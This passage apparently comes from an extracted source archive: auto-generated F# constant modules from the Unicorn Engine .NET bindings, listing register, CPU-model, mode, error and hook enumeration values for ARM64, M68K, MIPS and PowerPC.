UC_ARM64_REG_B26 = 34 let UC_ARM64_REG_B27 = 35 let UC_ARM64_REG_B28 = 36 let UC_ARM64_REG_B29 = 37 let UC_ARM64_REG_B30 = 38 let UC_ARM64_REG_B31 = 39 let UC_ARM64_REG_D0 = 40 let UC_ARM64_REG_D1 = 41 let UC_ARM64_REG_D2 = 42 let UC_ARM64_REG_D3 = 43 let UC_ARM64_REG_D4 = 44 let UC_ARM64_REG_D5 = 45 let UC_ARM64_REG_D6 = 46 let UC_ARM64_REG_D7 = 47 let UC_ARM64_REG_D8 = 48 let UC_ARM64_REG_D9 = 49 let UC_ARM64_REG_D10 = 50 let UC_ARM64_REG_D11 = 51 let UC_ARM64_REG_D12 = 52 let UC_ARM64_REG_D13 = 53 let UC_ARM64_REG_D14 = 54 let UC_ARM64_REG_D15 = 55 let UC_ARM64_REG_D16 = 56 let UC_ARM64_REG_D17 = 57 let UC_ARM64_REG_D18 = 58 let UC_ARM64_REG_D19 = 59 let UC_ARM64_REG_D20 = 60 let UC_ARM64_REG_D21 = 61 let UC_ARM64_REG_D22 = 62 let UC_ARM64_REG_D23 = 63 let UC_ARM64_REG_D24 = 64 let UC_ARM64_REG_D25 = 65 let UC_ARM64_REG_D26 = 66 let UC_ARM64_REG_D27 = 67 let UC_ARM64_REG_D28 = 68 let UC_ARM64_REG_D29 = 69 let UC_ARM64_REG_D30 = 70 let UC_ARM64_REG_D31 = 71 let UC_ARM64_REG_H0 = 72 let UC_ARM64_REG_H1 = 73 let UC_ARM64_REG_H2 = 74 let UC_ARM64_REG_H3 = 75 let UC_ARM64_REG_H4 = 76 let UC_ARM64_REG_H5 = 77 let UC_ARM64_REG_H6 = 78 let UC_ARM64_REG_H7 = 79 let UC_ARM64_REG_H8 = 80 let UC_ARM64_REG_H9 = 81 let UC_ARM64_REG_H10 = 82 let UC_ARM64_REG_H11 = 83 let UC_ARM64_REG_H12 = 84 let UC_ARM64_REG_H13 = 85 let UC_ARM64_REG_H14 = 86 let UC_ARM64_REG_H15 = 87 let UC_ARM64_REG_H16 = 88 let UC_ARM64_REG_H17 = 89 let UC_ARM64_REG_H18 = 90 let UC_ARM64_REG_H19 = 91 let UC_ARM64_REG_H20 = 92 let UC_ARM64_REG_H21 = 93 let UC_ARM64_REG_H22 = 94 let UC_ARM64_REG_H23 = 95 let UC_ARM64_REG_H24 = 96 let UC_ARM64_REG_H25 = 97 let UC_ARM64_REG_H26 = 98 let UC_ARM64_REG_H27 = 99 let UC_ARM64_REG_H28 = 100 let UC_ARM64_REG_H29 = 101 let UC_ARM64_REG_H30 = 102 let UC_ARM64_REG_H31 = 103 let UC_ARM64_REG_Q0 = 104 let UC_ARM64_REG_Q1 = 105 let UC_ARM64_REG_Q2 = 106 let UC_ARM64_REG_Q3 = 107 let UC_ARM64_REG_Q4 = 108 let UC_ARM64_REG_Q5 = 109 let UC_ARM64_REG_Q6 = 110 let UC_ARM64_REG_Q7 = 111 let UC_ARM64_REG_Q8 = 112 let UC_ARM64_REG_Q9 = 113 let UC_ARM64_REG_Q10 = 114 let UC_ARM64_REG_Q11 = 115 let UC_ARM64_REG_Q12 = 116 let UC_ARM64_REG_Q13 = 117 let UC_ARM64_REG_Q14 = 118 let UC_ARM64_REG_Q15 = 119 let UC_ARM64_REG_Q16 = 120 let UC_ARM64_REG_Q17 = 121 let UC_ARM64_REG_Q18 = 122 let UC_ARM64_REG_Q19 = 123 let UC_ARM64_REG_Q20 = 124 let UC_ARM64_REG_Q21 = 125 let UC_ARM64_REG_Q22 = 126 let UC_ARM64_REG_Q23 = 127 let UC_ARM64_REG_Q24 = 128 let UC_ARM64_REG_Q25 = 129 let UC_ARM64_REG_Q26 = 130 let UC_ARM64_REG_Q27 = 131 let UC_ARM64_REG_Q28 = 132 let UC_ARM64_REG_Q29 = 133 let UC_ARM64_REG_Q30 = 134 let UC_ARM64_REG_Q31 = 135 let UC_ARM64_REG_S0 = 136 let UC_ARM64_REG_S1 = 137 let UC_ARM64_REG_S2 = 138 let UC_ARM64_REG_S3 = 139 let UC_ARM64_REG_S4 = 140 let UC_ARM64_REG_S5 = 141 let UC_ARM64_REG_S6 = 142 let UC_ARM64_REG_S7 = 143 let UC_ARM64_REG_S8 = 144 let UC_ARM64_REG_S9 = 145 let UC_ARM64_REG_S10 = 146 let UC_ARM64_REG_S11 = 147 let UC_ARM64_REG_S12 = 148 let UC_ARM64_REG_S13 = 149 let UC_ARM64_REG_S14 = 150 let UC_ARM64_REG_S15 = 151 let UC_ARM64_REG_S16 = 152 let UC_ARM64_REG_S17 = 153 let UC_ARM64_REG_S18 = 154 let UC_ARM64_REG_S19 = 155 let UC_ARM64_REG_S20 = 156 let UC_ARM64_REG_S21 = 157 let UC_ARM64_REG_S22 = 158 let UC_ARM64_REG_S23 = 159 let UC_ARM64_REG_S24 = 160 let UC_ARM64_REG_S25 = 161 let UC_ARM64_REG_S26 = 162 let UC_ARM64_REG_S27 = 163 let UC_ARM64_REG_S28 = 164 let UC_ARM64_REG_S29 = 165 let UC_ARM64_REG_S30 = 166 let UC_ARM64_REG_S31 = 167 let UC_ARM64_REG_W0 = 168 let UC_ARM64_REG_W1 = 169 let UC_ARM64_REG_W2 = 170 let UC_ARM64_REG_W3 = 171 let UC_ARM64_REG_W4 = 172 let UC_ARM64_REG_W5 = 173 let UC_ARM64_REG_W6 = 174 let UC_ARM64_REG_W7 = 175 let UC_ARM64_REG_W8 = 176 let UC_ARM64_REG_W9 = 177 let UC_ARM64_REG_W10 = 178 let UC_ARM64_REG_W11 = 179 let UC_ARM64_REG_W12 = 180 let UC_ARM64_REG_W13 = 181 let UC_ARM64_REG_W14 = 182 let UC_ARM64_REG_W15 = 183 let UC_ARM64_REG_W16 = 184 let UC_ARM64_REG_W17 = 185 let UC_ARM64_REG_W18 = 186 let UC_ARM64_REG_W19 = 187 let UC_ARM64_REG_W20 = 188 let UC_ARM64_REG_W21 = 189 let UC_ARM64_REG_W22 = 190 let UC_ARM64_REG_W23 = 191 let UC_ARM64_REG_W24 = 192 let UC_ARM64_REG_W25 = 193 let UC_ARM64_REG_W26 = 194 let UC_ARM64_REG_W27 = 195 let UC_ARM64_REG_W28 = 196 let UC_ARM64_REG_W29 = 197 let UC_ARM64_REG_W30 = 198 let UC_ARM64_REG_X0 = 199 let UC_ARM64_REG_X1 = 200 let UC_ARM64_REG_X2 = 201 let UC_ARM64_REG_X3 = 202 let UC_ARM64_REG_X4 = 203 let UC_ARM64_REG_X5 = 204 let UC_ARM64_REG_X6 = 205 let UC_ARM64_REG_X7 = 206 let UC_ARM64_REG_X8 = 207 let UC_ARM64_REG_X9 = 208 let UC_ARM64_REG_X10 = 209 let UC_ARM64_REG_X11 = 210 let UC_ARM64_REG_X12 = 211 let UC_ARM64_REG_X13 = 212 let UC_ARM64_REG_X14 = 213 let UC_ARM64_REG_X15 = 214 let UC_ARM64_REG_X16 = 215 let UC_ARM64_REG_X17 = 216 let UC_ARM64_REG_X18 = 217 let UC_ARM64_REG_X19 = 218 let UC_ARM64_REG_X20 = 219 let UC_ARM64_REG_X21 = 220 let UC_ARM64_REG_X22 = 221 let UC_ARM64_REG_X23 = 222 let UC_ARM64_REG_X24 = 223 let UC_ARM64_REG_X25 = 224 let UC_ARM64_REG_X26 = 225 let UC_ARM64_REG_X27 = 226 let UC_ARM64_REG_X28 = 227 let UC_ARM64_REG_V0 = 228 let UC_ARM64_REG_V1 = 229 let UC_ARM64_REG_V2 = 230 let UC_ARM64_REG_V3 = 231 let UC_ARM64_REG_V4 = 232 let UC_ARM64_REG_V5 = 233 let UC_ARM64_REG_V6 = 234 let UC_ARM64_REG_V7 = 235 let UC_ARM64_REG_V8 = 236 let UC_ARM64_REG_V9 = 237 let UC_ARM64_REG_V10 = 238 let UC_ARM64_REG_V11 = 239 let UC_ARM64_REG_V12 = 240 let UC_ARM64_REG_V13 = 241 let UC_ARM64_REG_V14 = 242 let UC_ARM64_REG_V15 = 243 let UC_ARM64_REG_V16 = 244 let UC_ARM64_REG_V17 = 245 let UC_ARM64_REG_V18 = 246 let UC_ARM64_REG_V19 = 247 let UC_ARM64_REG_V20 = 248 let UC_ARM64_REG_V21 = 249 let UC_ARM64_REG_V22 = 250 let UC_ARM64_REG_V23 = 251 let UC_ARM64_REG_V24 = 252 let UC_ARM64_REG_V25 = 253 let UC_ARM64_REG_V26 = 254 let UC_ARM64_REG_V27 = 255 let UC_ARM64_REG_V28 = 256 let UC_ARM64_REG_V29 = 257 let UC_ARM64_REG_V30 = 258 let UC_ARM64_REG_V31 = 259 // pseudo registers let UC_ARM64_REG_PC = 260 let UC_ARM64_REG_CPACR_EL1 = 261 // thread registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_TPIDR_EL0 = 262 let UC_ARM64_REG_TPIDRRO_EL0 = 263 let UC_ARM64_REG_TPIDR_EL1 = 264 let UC_ARM64_REG_PSTATE = 265 // exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_ELR_EL0 = 266 let UC_ARM64_REG_ELR_EL1 = 267 let UC_ARM64_REG_ELR_EL2 = 268 let UC_ARM64_REG_ELR_EL3 = 269 // stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_SP_EL0 = 270 let UC_ARM64_REG_SP_EL1 = 271 let UC_ARM64_REG_SP_EL2 = 272 let UC_ARM64_REG_SP_EL3 = 273 // other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead let UC_ARM64_REG_TTBR0_EL1 = 274 let UC_ARM64_REG_TTBR1_EL1 = 275 let UC_ARM64_REG_ESR_EL0 = 276 let UC_ARM64_REG_ESR_EL1 = 277 let UC_ARM64_REG_ESR_EL2 = 278 let UC_ARM64_REG_ESR_EL3 = 279 let UC_ARM64_REG_FAR_EL0 = 280 let UC_ARM64_REG_FAR_EL1 = 281 let UC_ARM64_REG_FAR_EL2 = 282 let UC_ARM64_REG_FAR_EL3 = 283 let UC_ARM64_REG_PAR_EL1 = 284 let UC_ARM64_REG_MAIR_EL1 = 285 let UC_ARM64_REG_VBAR_EL0 = 286 let UC_ARM64_REG_VBAR_EL1 = 287 let UC_ARM64_REG_VBAR_EL2 = 288 let UC_ARM64_REG_VBAR_EL3 = 289 let UC_ARM64_REG_CP_REG = 290 // floating point control and status registers let UC_ARM64_REG_FPCR = 291 let UC_ARM64_REG_FPSR = 292 let UC_ARM64_REG_ENDING = 293 // alias registers let UC_ARM64_REG_IP0 = 215 let UC_ARM64_REG_IP1 = 216 let UC_ARM64_REG_FP = 1 let UC_ARM64_REG_LR = 2 // ARM64 instructions let UC_ARM64_INS_INVALID = 0 let UC_ARM64_INS_MRS = 1 let UC_ARM64_INS_MSR = 2 let UC_ARM64_INS_SYS = 3 let UC_ARM64_INS_SYSL = 4 let UC_ARM64_INS_ENDING = 5 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Common.fs000066400000000000000000000103001467524106700237030ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Common = let UC_API_MAJOR = 2 let UC_API_MINOR = 1 let UC_API_PATCH = 0 let UC_API_EXTRA = 255 let UC_VERSION_MAJOR = 2 let UC_VERSION_MINOR = 1 let UC_VERSION_PATCH = 0 let UC_VERSION_EXTRA = 255 let UC_SECOND_SCALE = 1000000 let UC_MILISECOND_SCALE = 1000 let UC_ARCH_ARM = 1 let UC_ARCH_ARM64 = 2 let UC_ARCH_MIPS = 3 let UC_ARCH_X86 = 4 let UC_ARCH_PPC = 5 let UC_ARCH_SPARC = 6 let UC_ARCH_M68K = 7 let UC_ARCH_RISCV = 8 let UC_ARCH_S390X = 9 let UC_ARCH_TRICORE = 10 let UC_ARCH_MAX = 11 let UC_MODE_LITTLE_ENDIAN = 0 let UC_MODE_BIG_ENDIAN = 1073741824 let UC_MODE_ARM = 0 let UC_MODE_THUMB = 16 let UC_MODE_MCLASS = 32 let UC_MODE_V8 = 64 let UC_MODE_ARMBE8 = 1024 let UC_MODE_ARM926 = 128 let UC_MODE_ARM946 = 256 let UC_MODE_ARM1176 = 512 let UC_MODE_MICRO = 16 let UC_MODE_MIPS3 = 32 let UC_MODE_MIPS32R6 = 64 let UC_MODE_MIPS32 = 4 let UC_MODE_MIPS64 = 8 let UC_MODE_16 = 2 let UC_MODE_32 = 4 let UC_MODE_64 = 8 let UC_MODE_PPC32 = 4 let UC_MODE_PPC64 = 8 let UC_MODE_QPX = 16 let UC_MODE_SPARC32 = 4 let UC_MODE_SPARC64 = 8 let UC_MODE_V9 = 16 let UC_MODE_RISCV32 = 4 let UC_MODE_RISCV64 = 8 let UC_ERR_OK = 0 let UC_ERR_NOMEM = 1 let UC_ERR_ARCH = 2 let UC_ERR_HANDLE = 3 let UC_ERR_MODE = 4 let UC_ERR_VERSION = 5 let UC_ERR_READ_UNMAPPED = 6 let UC_ERR_WRITE_UNMAPPED = 7 let UC_ERR_FETCH_UNMAPPED = 8 let UC_ERR_HOOK = 9 let UC_ERR_INSN_INVALID = 10 let UC_ERR_MAP = 11 let UC_ERR_WRITE_PROT = 12 let UC_ERR_READ_PROT = 13 let UC_ERR_FETCH_PROT = 14 let UC_ERR_ARG = 15 let UC_ERR_READ_UNALIGNED = 16 let UC_ERR_WRITE_UNALIGNED = 17 let UC_ERR_FETCH_UNALIGNED = 18 let UC_ERR_HOOK_EXIST = 19 let UC_ERR_RESOURCE = 20 let UC_ERR_EXCEPTION = 21 let UC_ERR_OVERFLOW = 22 let UC_MEM_READ = 16 let UC_MEM_WRITE = 17 let UC_MEM_FETCH = 18 let UC_MEM_READ_UNMAPPED = 19 let UC_MEM_WRITE_UNMAPPED = 20 let UC_MEM_FETCH_UNMAPPED = 21 let UC_MEM_WRITE_PROT = 22 let UC_MEM_READ_PROT = 23 let UC_MEM_FETCH_PROT = 24 let UC_MEM_READ_AFTER = 25 let UC_TCG_OP_SUB = 0 let UC_TCG_OP_FLAG_CMP = 1 let UC_TCG_OP_FLAG_DIRECT = 2 let UC_HOOK_INTR = 1 let UC_HOOK_INSN = 2 let UC_HOOK_CODE = 4 let UC_HOOK_BLOCK = 8 let UC_HOOK_MEM_READ_UNMAPPED = 16 let UC_HOOK_MEM_WRITE_UNMAPPED = 32 let UC_HOOK_MEM_FETCH_UNMAPPED = 64 let UC_HOOK_MEM_READ_PROT = 128 let UC_HOOK_MEM_WRITE_PROT = 256 let UC_HOOK_MEM_FETCH_PROT = 512 let UC_HOOK_MEM_READ = 1024 let UC_HOOK_MEM_WRITE = 2048 let UC_HOOK_MEM_FETCH = 4096 let UC_HOOK_MEM_READ_AFTER = 8192 let UC_HOOK_INSN_INVALID = 16384 let UC_HOOK_EDGE_GENERATED = 32768 let UC_HOOK_TCG_OPCODE = 65536 let UC_HOOK_TLB_FILL = 131072 let UC_HOOK_MEM_UNMAPPED = 112 let UC_HOOK_MEM_PROT = 896 let UC_HOOK_MEM_READ_INVALID = 144 let UC_HOOK_MEM_WRITE_INVALID = 288 let UC_HOOK_MEM_FETCH_INVALID = 576 let UC_HOOK_MEM_INVALID = 1008 let UC_HOOK_MEM_VALID = 7168 let UC_QUERY_MODE = 1 let UC_QUERY_PAGE_SIZE = 2 let UC_QUERY_ARCH = 3 let UC_QUERY_TIMEOUT = 4 let UC_CTL_IO_NONE = 0 let UC_CTL_IO_WRITE = 1 let UC_CTL_IO_READ = 2 let UC_CTL_IO_READ_WRITE = 3 let UC_TLB_CPU = 0 let UC_TLB_VIRTUAL = 1 let UC_CTL_UC_MODE = 0 let UC_CTL_UC_PAGE_SIZE = 1 let UC_CTL_UC_ARCH = 2 let UC_CTL_UC_TIMEOUT = 3 let UC_CTL_UC_USE_EXITS = 4 let UC_CTL_UC_EXITS_CNT = 5 let UC_CTL_UC_EXITS = 6 let UC_CTL_CPU_MODEL = 7 let UC_CTL_TB_REQUEST_CACHE = 8 let UC_CTL_TB_REMOVE_CACHE = 9 let UC_CTL_TB_FLUSH = 10 let UC_CTL_TLB_FLUSH = 11 let UC_CTL_TLB_TYPE = 12 let UC_CTL_TCG_BUFFER_SIZE = 13 let UC_CTL_CONTEXT_MODE = 14 let UC_PROT_NONE = 0 let UC_PROT_READ = 1 let UC_PROT_WRITE = 2 let UC_PROT_EXEC = 4 let UC_PROT_ALL = 7 let UC_CTL_CONTEXT_CPU = 1 let UC_CTL_CONTEXT_MEMORY = 2 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/M68k.fs000066400000000000000000000020121467524106700232010ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module M68k = // M68K CPU let UC_CPU_M68K_M5206 = 0 let UC_CPU_M68K_M68000 = 1 let UC_CPU_M68K_M68020 = 2 let UC_CPU_M68K_M68030 = 3 let UC_CPU_M68K_M68040 = 4 let UC_CPU_M68K_M68060 = 5 let UC_CPU_M68K_M5208 = 6 let UC_CPU_M68K_CFV4E = 7 let UC_CPU_M68K_ANY = 8 let UC_CPU_M68K_ENDING = 9 // M68K registers let UC_M68K_REG_INVALID = 0 let UC_M68K_REG_A0 = 1 let UC_M68K_REG_A1 = 2 let UC_M68K_REG_A2 = 3 let UC_M68K_REG_A3 = 4 let UC_M68K_REG_A4 = 5 let UC_M68K_REG_A5 = 6 let UC_M68K_REG_A6 = 7 let UC_M68K_REG_A7 = 8 let UC_M68K_REG_D0 = 9 let UC_M68K_REG_D1 = 10 let UC_M68K_REG_D2 = 11 let UC_M68K_REG_D3 = 12 let UC_M68K_REG_D4 = 13 let UC_M68K_REG_D5 = 14 let UC_M68K_REG_D6 = 15 let UC_M68K_REG_D7 = 16 let UC_M68K_REG_SR = 17 let UC_M68K_REG_PC = 18 let UC_M68K_REG_ENDING = 19 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Mips.fs000066400000000000000000000150351467524106700233750ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Mips = // MIPS32 CPUS let UC_CPU_MIPS32_4KC = 0 let UC_CPU_MIPS32_4KM = 1 let UC_CPU_MIPS32_4KECR1 = 2 let UC_CPU_MIPS32_4KEMR1 = 3 let UC_CPU_MIPS32_4KEC = 4 let UC_CPU_MIPS32_4KEM = 5 let UC_CPU_MIPS32_24KC = 6 let UC_CPU_MIPS32_24KEC = 7 let UC_CPU_MIPS32_24KF = 8 let UC_CPU_MIPS32_34KF = 9 let UC_CPU_MIPS32_74KF = 10 let UC_CPU_MIPS32_M14K = 11 let UC_CPU_MIPS32_M14KC = 12 let UC_CPU_MIPS32_P5600 = 13 let UC_CPU_MIPS32_MIPS32R6_GENERIC = 14 let UC_CPU_MIPS32_I7200 = 15 let UC_CPU_MIPS32_ENDING = 16 // MIPS64 CPUS let UC_CPU_MIPS64_R4000 = 0 let UC_CPU_MIPS64_VR5432 = 1 let UC_CPU_MIPS64_5KC = 2 let UC_CPU_MIPS64_5KF = 3 let UC_CPU_MIPS64_20KC = 4 let UC_CPU_MIPS64_MIPS64R2_GENERIC = 5 let UC_CPU_MIPS64_5KEC = 6 let UC_CPU_MIPS64_5KEF = 7 let UC_CPU_MIPS64_I6400 = 8 let UC_CPU_MIPS64_I6500 = 9 let UC_CPU_MIPS64_LOONGSON_2E = 10 let UC_CPU_MIPS64_LOONGSON_2F = 11 let UC_CPU_MIPS64_MIPS64DSPR2 = 12 let UC_CPU_MIPS64_ENDING = 13 // MIPS registers let UC_MIPS_REG_INVALID = 0 // General purpose registers let UC_MIPS_REG_PC = 1 let UC_MIPS_REG_0 = 2 let UC_MIPS_REG_1 = 3 let UC_MIPS_REG_2 = 4 let UC_MIPS_REG_3 = 5 let UC_MIPS_REG_4 = 6 let UC_MIPS_REG_5 = 7 let UC_MIPS_REG_6 = 8 let UC_MIPS_REG_7 = 9 let UC_MIPS_REG_8 = 10 let UC_MIPS_REG_9 = 11 let UC_MIPS_REG_10 = 12 let UC_MIPS_REG_11 = 13 let UC_MIPS_REG_12 = 14 let UC_MIPS_REG_13 = 15 let UC_MIPS_REG_14 = 16 let UC_MIPS_REG_15 = 17 let UC_MIPS_REG_16 = 18 let UC_MIPS_REG_17 = 19 let UC_MIPS_REG_18 = 20 let UC_MIPS_REG_19 = 21 let UC_MIPS_REG_20 = 22 let UC_MIPS_REG_21 = 23 let UC_MIPS_REG_22 = 24 let UC_MIPS_REG_23 = 25 let UC_MIPS_REG_24 = 26 let UC_MIPS_REG_25 = 27 let UC_MIPS_REG_26 = 28 let UC_MIPS_REG_27 = 29 let UC_MIPS_REG_28 = 30 let UC_MIPS_REG_29 = 31 let UC_MIPS_REG_30 = 32 let UC_MIPS_REG_31 = 33 // DSP registers let UC_MIPS_REG_DSPCCOND = 34 let UC_MIPS_REG_DSPCARRY = 35 let UC_MIPS_REG_DSPEFI = 36 let UC_MIPS_REG_DSPOUTFLAG = 37 let UC_MIPS_REG_DSPOUTFLAG16_19 = 38 let UC_MIPS_REG_DSPOUTFLAG20 = 39 let UC_MIPS_REG_DSPOUTFLAG21 = 40 let UC_MIPS_REG_DSPOUTFLAG22 = 41 let UC_MIPS_REG_DSPOUTFLAG23 = 42 let UC_MIPS_REG_DSPPOS = 43 let UC_MIPS_REG_DSPSCOUNT = 44 // ACC registers let UC_MIPS_REG_AC0 = 45 let UC_MIPS_REG_AC1 = 46 let UC_MIPS_REG_AC2 = 47 let UC_MIPS_REG_AC3 = 48 // COP registers let UC_MIPS_REG_CC0 = 49 let UC_MIPS_REG_CC1 = 50 let UC_MIPS_REG_CC2 = 51 let UC_MIPS_REG_CC3 = 52 let UC_MIPS_REG_CC4 = 53 let UC_MIPS_REG_CC5 = 54 let UC_MIPS_REG_CC6 = 55 let UC_MIPS_REG_CC7 = 56 // FPU registers let UC_MIPS_REG_F0 = 57 let UC_MIPS_REG_F1 = 58 let UC_MIPS_REG_F2 = 59 let UC_MIPS_REG_F3 = 60 let UC_MIPS_REG_F4 = 61 let UC_MIPS_REG_F5 = 62 let UC_MIPS_REG_F6 = 63 let UC_MIPS_REG_F7 = 64 let UC_MIPS_REG_F8 = 65 let UC_MIPS_REG_F9 = 66 let UC_MIPS_REG_F10 = 67 let UC_MIPS_REG_F11 = 68 let UC_MIPS_REG_F12 = 69 let UC_MIPS_REG_F13 = 70 let UC_MIPS_REG_F14 = 71 let UC_MIPS_REG_F15 = 72 let UC_MIPS_REG_F16 = 73 let UC_MIPS_REG_F17 = 74 let UC_MIPS_REG_F18 = 75 let UC_MIPS_REG_F19 = 76 let UC_MIPS_REG_F20 = 77 let UC_MIPS_REG_F21 = 78 let UC_MIPS_REG_F22 = 79 let UC_MIPS_REG_F23 = 80 let UC_MIPS_REG_F24 = 81 let UC_MIPS_REG_F25 = 82 let UC_MIPS_REG_F26 = 83 let UC_MIPS_REG_F27 = 84 let UC_MIPS_REG_F28 = 85 let UC_MIPS_REG_F29 = 86 let UC_MIPS_REG_F30 = 87 let UC_MIPS_REG_F31 = 88 let UC_MIPS_REG_FCC0 = 89 let UC_MIPS_REG_FCC1 = 90 let UC_MIPS_REG_FCC2 = 91 let UC_MIPS_REG_FCC3 = 92 let UC_MIPS_REG_FCC4 = 93 let UC_MIPS_REG_FCC5 = 94 let UC_MIPS_REG_FCC6 = 95 let UC_MIPS_REG_FCC7 = 96 // AFPR128 let UC_MIPS_REG_W0 = 97 let UC_MIPS_REG_W1 = 98 let UC_MIPS_REG_W2 = 99 let UC_MIPS_REG_W3 = 100 let UC_MIPS_REG_W4 = 101 let UC_MIPS_REG_W5 = 102 let UC_MIPS_REG_W6 = 103 let UC_MIPS_REG_W7 = 104 let UC_MIPS_REG_W8 = 105 let UC_MIPS_REG_W9 = 106 let UC_MIPS_REG_W10 = 107 let UC_MIPS_REG_W11 = 108 let UC_MIPS_REG_W12 = 109 let UC_MIPS_REG_W13 = 110 let UC_MIPS_REG_W14 = 111 let UC_MIPS_REG_W15 = 112 let UC_MIPS_REG_W16 = 113 let UC_MIPS_REG_W17 = 114 let UC_MIPS_REG_W18 = 115 let UC_MIPS_REG_W19 = 116 let UC_MIPS_REG_W20 = 117 let UC_MIPS_REG_W21 = 118 let UC_MIPS_REG_W22 = 119 let UC_MIPS_REG_W23 = 120 let UC_MIPS_REG_W24 = 121 let UC_MIPS_REG_W25 = 122 let UC_MIPS_REG_W26 = 123 let UC_MIPS_REG_W27 = 124 let UC_MIPS_REG_W28 = 125 let UC_MIPS_REG_W29 = 126 let UC_MIPS_REG_W30 = 127 let UC_MIPS_REG_W31 = 128 let UC_MIPS_REG_HI = 129 let UC_MIPS_REG_LO = 130 let UC_MIPS_REG_P0 = 131 let UC_MIPS_REG_P1 = 132 let UC_MIPS_REG_P2 = 133 let UC_MIPS_REG_MPL0 = 134 let UC_MIPS_REG_MPL1 = 135 let UC_MIPS_REG_MPL2 = 136 let UC_MIPS_REG_CP0_CONFIG3 = 137 let UC_MIPS_REG_CP0_USERLOCAL = 138 let UC_MIPS_REG_CP0_STATUS = 139 let UC_MIPS_REG_ENDING = 140 let UC_MIPS_REG_ZERO = 2 let UC_MIPS_REG_AT = 3 let UC_MIPS_REG_V0 = 4 let UC_MIPS_REG_V1 = 5 let UC_MIPS_REG_A0 = 6 let UC_MIPS_REG_A1 = 7 let UC_MIPS_REG_A2 = 8 let UC_MIPS_REG_A3 = 9 let UC_MIPS_REG_T0 = 10 let UC_MIPS_REG_T1 = 11 let UC_MIPS_REG_T2 = 12 let UC_MIPS_REG_T3 = 13 let UC_MIPS_REG_T4 = 14 let UC_MIPS_REG_T5 = 15 let UC_MIPS_REG_T6 = 16 let UC_MIPS_REG_T7 = 17 let UC_MIPS_REG_S0 = 18 let UC_MIPS_REG_S1 = 19 let UC_MIPS_REG_S2 = 20 let UC_MIPS_REG_S3 = 21 let UC_MIPS_REG_S4 = 22 let UC_MIPS_REG_S5 = 23 let UC_MIPS_REG_S6 = 24 let UC_MIPS_REG_S7 = 25 let UC_MIPS_REG_T8 = 26 let UC_MIPS_REG_T9 = 27 let UC_MIPS_REG_K0 = 28 let UC_MIPS_REG_K1 = 29 let UC_MIPS_REG_GP = 30 let UC_MIPS_REG_SP = 31 let UC_MIPS_REG_FP = 32 let UC_MIPS_REG_S8 = 32 let UC_MIPS_REG_RA = 33 let UC_MIPS_REG_HI0 = 45 let UC_MIPS_REG_HI1 = 46 let UC_MIPS_REG_HI2 = 47 let UC_MIPS_REG_HI3 = 48 let UC_MIPS_REG_LO0 = 45 let UC_MIPS_REG_LO1 = 46 let UC_MIPS_REG_LO2 = 47 let UC_MIPS_REG_LO3 = 48 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Ppc.fs000066400000000000000000000325721467524106700232140ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Ppc = // PPC CPU let UC_CPU_PPC32_401 = 0 let UC_CPU_PPC32_401A1 = 1 let UC_CPU_PPC32_401B2 = 2 let UC_CPU_PPC32_401C2 = 3 let UC_CPU_PPC32_401D2 = 4 let UC_CPU_PPC32_401E2 = 5 let UC_CPU_PPC32_401F2 = 6 let UC_CPU_PPC32_401G2 = 7 let UC_CPU_PPC32_IOP480 = 8 let UC_CPU_PPC32_COBRA = 9 let UC_CPU_PPC32_403GA = 10 let UC_CPU_PPC32_403GB = 11 let UC_CPU_PPC32_403GC = 12 let UC_CPU_PPC32_403GCX = 13 let UC_CPU_PPC32_405D2 = 14 let UC_CPU_PPC32_405D4 = 15 let UC_CPU_PPC32_405CRA = 16 let UC_CPU_PPC32_405CRB = 17 let UC_CPU_PPC32_405CRC = 18 let UC_CPU_PPC32_405EP = 19 let UC_CPU_PPC32_405EZ = 20 let UC_CPU_PPC32_405GPA = 21 let UC_CPU_PPC32_405GPB = 22 let UC_CPU_PPC32_405GPC = 23 let UC_CPU_PPC32_405GPD = 24 let UC_CPU_PPC32_405GPR = 25 let UC_CPU_PPC32_405LP = 26 let UC_CPU_PPC32_NPE405H = 27 let UC_CPU_PPC32_NPE405H2 = 28 let UC_CPU_PPC32_NPE405L = 29 let UC_CPU_PPC32_NPE4GS3 = 30 let UC_CPU_PPC32_STB03 = 31 let UC_CPU_PPC32_STB04 = 32 let UC_CPU_PPC32_STB25 = 33 let UC_CPU_PPC32_X2VP4 = 34 let UC_CPU_PPC32_X2VP20 = 35 let UC_CPU_PPC32_440_XILINX = 36 let UC_CPU_PPC32_440_XILINX_W_DFPU = 37 let UC_CPU_PPC32_440EPA = 38 let UC_CPU_PPC32_440EPB = 39 let UC_CPU_PPC32_440EPX = 40 let UC_CPU_PPC32_460EXB = 41 let UC_CPU_PPC32_G2 = 42 let UC_CPU_PPC32_G2H4 = 43 let UC_CPU_PPC32_G2GP = 44 let UC_CPU_PPC32_G2LS = 45 let UC_CPU_PPC32_G2HIP3 = 46 let UC_CPU_PPC32_G2HIP4 = 47 let UC_CPU_PPC32_MPC603 = 48 let UC_CPU_PPC32_G2LE = 49 let UC_CPU_PPC32_G2LEGP = 50 let UC_CPU_PPC32_G2LELS = 51 let UC_CPU_PPC32_G2LEGP1 = 52 let UC_CPU_PPC32_G2LEGP3 = 53 let UC_CPU_PPC32_MPC5200_V10 = 54 let UC_CPU_PPC32_MPC5200_V11 = 55 let UC_CPU_PPC32_MPC5200_V12 = 56 let UC_CPU_PPC32_MPC5200B_V20 = 57 let UC_CPU_PPC32_MPC5200B_V21 = 58 let UC_CPU_PPC32_E200Z5 = 59 let UC_CPU_PPC32_E200Z6 = 60 let UC_CPU_PPC32_E300C1 = 61 let UC_CPU_PPC32_E300C2 = 62 let UC_CPU_PPC32_E300C3 = 63 